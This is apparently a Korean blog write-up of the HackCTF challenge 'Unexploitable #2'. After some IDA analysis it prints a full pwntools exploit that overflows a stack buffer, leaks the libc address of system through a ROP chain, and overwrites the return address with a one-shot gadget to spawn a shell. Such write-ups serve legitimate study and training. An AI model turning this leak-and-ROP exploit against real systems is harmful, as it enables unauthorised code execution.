HackCTF - Unexploitable #2

2020. 9. 6. 20:22CTF's Write-up

문제 화면

 

문제를 ida로 까보면 아래와 같습니다.

 

 

ida main

 

출력하나 해주고, 입력하나 받고 끝나는데 사용할 수 있는 함수가

 

 

 

이거밖에 없습니다.

gift가 수상해서 봤더니

 

ida gift

 

shell을 띄워주는게 아닌 system함수만 보내주는군요

 

 

마침 카나리도 안보이니 ret만 잘 oneshot으로 덮어주면 될 것 같은데 oneshot을 쓰려면 libcbase를 알아야하니 여기서 멘붕에 조금 빠졌습니다. rop체인을 구성해서 bss에 /bin/sh 박아서 system인자로 넣어줄까도 생각하다가 pr가젯사용해서 system인자에 넣어주면 주소 출력한다는 이야기를 들은기억이 있어서 구성해봤는데 실제도 되더라고요...

payload는 아래와 같습니다.

이게 인텐드인지 bss에 넣어서 하는게 인텐드인지 출제자한테 물어봐야겠군요.

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
 
= remote("ctf.j0n9hyun.xyz"3029)
#r = process("./Unexploitable_2")
= ELF("./Unexploitable_2")
= e.libc
context.log_level = "debug"
 
pr = 0x0000000000400773
system_got = e.got['system']
system_plt = e.plt['system']
system_off = l.sym['system']
main_add = 0x000000000040068C
oneshot_off = 0xf02a4
 
 
r.recvuntil("!\n")
 
pay = ""
pay += "A"*0x18
pay += p64(pr)
pay += p64(system_got)
pay += p64(system_plt)
pay += p64(main_add)
 
r.sendline(pay)
 
r.recvuntil("1: ")
leak = u64(r.recv(6)+"\x00\x00")
libc_base = leak - system_off
one_shot_add = libc_base + oneshot_off
 
log.info("leak = " + hex(leak))
log.info("libc_base = " + hex(libc_base))
 
 
r.recvuntil("!\n")
pay2 = ""
pay2 += "A"*0x18
pay2 += p64(one_shot_add)
 
r.sendline(pay2)
r.interactive()
cs

 

실행하면?!

 

 

 

이와 같이  shell 획득이 가능합니다.

 

'CTF's Write-up' 카테고리의 다른 글

HACKCTF - Poet  (0) 2020.09.07
HACKCTF - Let'S get it ! Boo*4  (0) 2020.09.07
HACKCTF - Handray  (0) 2020.09.03
[보호]HACKCTF - Cookie  (0) 2020.09.01
HACKCTF - Yes or no  (0) 2020.08.27